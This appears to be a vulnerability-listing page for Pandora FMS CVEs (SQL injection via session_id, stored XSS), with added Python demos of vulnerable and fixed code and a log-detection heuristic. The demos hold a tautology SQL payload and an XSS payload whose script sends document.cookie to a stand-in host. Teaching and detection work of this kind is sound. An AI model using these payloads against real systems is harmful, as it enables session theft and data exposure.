CVE-2020-26518
https://notcve.org/view.php?id=CVE-2020-26518
Artica Pandora FMS before 743 allows unauthenticated attackers to conduct SQL injection attacks via the session_id parameter of pandora_console/include/chart_generator.php. • https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
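An added illustration of the CWE-89 pattern behind this entry, written for this page and not taken from Pandora FMS: a request parameter spliced into SQL text beside the parameterised form, plus a heuristic that flags injection attempts against this endpoint in web-server access logs. The SQLite `sessions` table, the tautology payload, the access-log lines and the detection regex are all constructed assumptions; only the script path and the parameter name `session_id` come from the advisory.

```python
"""Hypothetical CWE-89 demo for the chart_generator.php session_id case.
Not Pandora FMS code: schema, data, payload and log lines are constructed."""
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit


def make_db() -> sqlite3.Connection:
    # Constructed toy table; the real Pandora schema is not on the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sessions (id_session TEXT PRIMARY KEY, id_user TEXT)")
    conn.executemany("INSERT INTO sessions VALUES (?, ?)",
                     [("abc123", "admin"), ("def456", "operator")])
    return conn


def lookup_unsafe(conn: sqlite3.Connection, session_id: str) -> list:
    # Vulnerable pattern: the untrusted value becomes part of the SQL text,
    # so quotes in it change the query structure.
    sql = f"SELECT id_user FROM sessions WHERE id_session = '{session_id}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, session_id: str) -> list:
    # Hardened pattern: the value is bound as a parameter and can only ever
    # be compared as data, never parsed as SQL.
    sql = "SELECT id_user FROM sessions WHERE id_session = ?"
    return [row[0] for row in conn.execute(sql, (session_id,))]


PAYLOAD = "x' OR '1'='1"  # constructed tautology payload for the demo


def demo() -> dict:
    conn = make_db()
    return {
        "unsafe_normal": lookup_unsafe(conn, "abc123"),
        "unsafe_payload": lookup_unsafe(conn, PAYLOAD),  # leaks every row
        "safe_normal": lookup_safe(conn, "abc123"),
        "safe_payload": lookup_safe(conn, PAYLOAD),      # matches nothing
    }


# --- detection side: hypothetical rule over Apache/nginx combined-format logs ---
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SQLI_HINT = re.compile(r"['\"]|--|\b(or|and|union|select|sleep)\b", re.IGNORECASE)
TARGET = "/pandora_console/include/chart_generator.php"


def suspicious_requests(log_lines) -> list:
    """Return decoded session_id values that look like injection attempts
    against chart_generator.php. Heuristic only; tune before production use."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith(TARGET):
            continue
        for value in parse_qs(url.query).get("session_id", []):  # percent-decoded
            if SQLI_HINT.search(value):
                hits.append(value)
    return hits


SAMPLE_LOG = [  # constructed lines, not from any real server
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /pandora_console/include/chart_generator.php?session_id=abc123 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2020:10:00:01 +0000] "GET /pandora_console/include/chart_generator.php?session_id=x%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /pandora_console/index.php?sec=view HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
    print("suspicious:", suspicious_requests(SAMPLE_LOG))
```

The unsafe lookup returns both users for the tautology payload while the bound-parameter version returns nothing, which is the whole difference between CWE-89 and its fix. The log rule only sees the query string, so a POST body or a second parameter would need the same treatment.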
CVE-2020-11749 – PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting
https://notcve.org/view.php?id=CVE-2020-11749
Pandora FMS 7.0 NG 746 and earlier suffers from multiple XSS vulnerabilities in different browser views. A network administrator scanning an SNMP device can trigger a persistent cross-site scripting (XSS) payload, which can run arbitrary code and lead to remote code execution as root or apache2. • https://www.exploit-db.com/exploits/48707 https://medium.com/%40tehwinsam/multiple-xss-on-pandorafms-7-0-ng-744-64b244b8523c https://packetstormsecurity.com/files/158389/Pandora-FMS-7.0-NG-746-Script-Insertion-Code-Execution.html https://pandorafms.com/downloads/whats-new-747-EN.pdf • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVE-2019-19968
https://notcve.org/view.php?id=CVE-2019-19968
PandoraFMS 742 suffers from multiple XSS vulnerabilities affecting the Agent Management, Report Builder, and Graph Builder components. An authenticated user can inject dangerous content into a data store that is later read and included in dynamic content. • https://k4m1ll0.com/cve-2019-19968.html https://pandorafms.com • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
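Both XSS entries above (CVE-2020-11749, where data reported by a scanned SNMP device lands in a console view, and CVE-2019-19968, where stored values are later included in dynamic content) are the same CWE-79 shape: attacker-controlled text is stored and then written into HTML without output encoding. The following is an added example written for this page, not Pandora FMS code. The stored record (a hypothetical `sysName` and description), the table-cell template and the parser-based check are all constructed; the example shows a raw render beside an escaped one and verifies the difference by parsing the resulting markup rather than by string matching.

```python
"""Hypothetical CWE-79 demo: stored values rendered raw versus HTML-escaped.
Not Pandora FMS code; the record and template below are constructed."""
import html
from html.parser import HTMLParser

# Constructed sample of what an untrusted device or agent might report.
# Both values carry a payload: one breaks out in text context, the other
# closes the attribute it is placed in and adds an event handler.
STORED = {
    "sysName": 'core-sw01<script>fetch("http://evil.test/?c="+document.cookie)</script>',
    "description": 'router" onmouseover="alert(1)',
}


def render_unsafe(record: dict) -> str:
    # Vulnerable pattern: stored strings echoed straight into the template.
    return (f'<td title="{record["description"]}">'
            f'{record["sysName"]}</td>')


def render_safe(record: dict) -> str:
    # Hardened pattern: escape at output time, in text and attribute context.
    # quote=True also encodes " and ' so an attribute cannot be closed early.
    return (f'<td title="{html.escape(record["description"], quote=True)}">'
            f'{html.escape(record["sysName"], quote=True)}</td>')


class TagCollector(HTMLParser):
    """Collect every start tag and its attributes from a fragment, so we can
    see what a browser would actually treat as markup."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.setdefault(tag, {}).update(attrs)


def parse_tags(markup: str):
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags, p.attrs


def is_contained(markup: str, allowed_tag: str = "td") -> bool:
    """True if the fragment yields only the expected tag and no on* handlers."""
    tags, attrs = parse_tags(markup)
    if tags != [allowed_tag]:
        return False
    return not any(name.lower().startswith("on") for name in attrs[allowed_tag])


if __name__ == "__main__":
    for label, fn in (("unsafe", render_unsafe), ("safe", render_safe)):
        out = fn(STORED)
        print(label, "contained:", is_contained(out))
        print("  ", out)
```

The raw render parses into a `td` plus a `script` element and an `onmouseover` attribute; the escaped render parses into a single `td` whose `title` merely contains the quote characters as data. Escaping is context-specific, so the same stored value dropped into a JavaScript block or a URL would need that context's encoder instead of `html.escape`.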